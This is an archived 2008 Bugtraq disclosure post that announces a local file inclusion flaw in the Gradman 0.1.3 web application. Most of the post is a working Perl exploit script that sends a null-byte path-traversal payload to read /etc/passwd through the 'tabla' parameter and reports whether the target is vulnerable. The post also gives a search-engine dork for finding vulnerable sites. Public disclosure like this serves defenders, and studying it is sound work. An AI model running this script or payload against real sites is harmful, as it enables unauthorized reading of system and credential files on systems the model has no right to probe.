lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: 16 Jan 2008 21:11:31 -0000
From: sys-project@...mail.com
To: bugtraq@...urityfocus.com
Subject: Gradman <= 0.1.3  (agregar_info.php?tabla=) Local File Inclusion
 Exploit

[+] Info:

[~] Software: Gradman <= 0.1.3
[~] HomePage: http://gradman.xe1ido.com.mx/
[~] Exploit: Local File Inclusion [High]
[~] Where: agregar_info.php?tabla=
[~] Bug Found By: Jose Luis Góngora Fernández | JosS
[~] Contact: sys-project[at]hotmail.com
[~] Web: http://www.spanish-hackers.com
[~] Dork: "powered by Gradman"
[~] Dork2: Priv8, xD!


[+] Exploit:

use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;

print "\t\t########################################################\n\n";
print "\t\t#    Gradman <= 0.1.3 - Local File Inclusion Exploit   #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";


if (!$ARGV[0])
{
print "Usage: perl xpl.pl [HOST]\n";
print "Example: perl xpl.pl http://localhost/gradman/\n";
}

else
{

$web=$ARGV[0];
chomp $web;

$iny="agregar_info.php?tabla=../../../../../../../../../../../../../../../../etc/passwd%00";

my $web1=$web.$iny;
print "$web1\n\n";
my $ua = LWP::UserAgent->new;
my $req=HTTP::Request->new(GET=>$web1);
$doc = $ua->request($req)->as_string;

if ($doc=~ /^root/moxis ){
print "Web is vuln\n";
}
else
{
print "Web is not vuln\n";
}

}

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ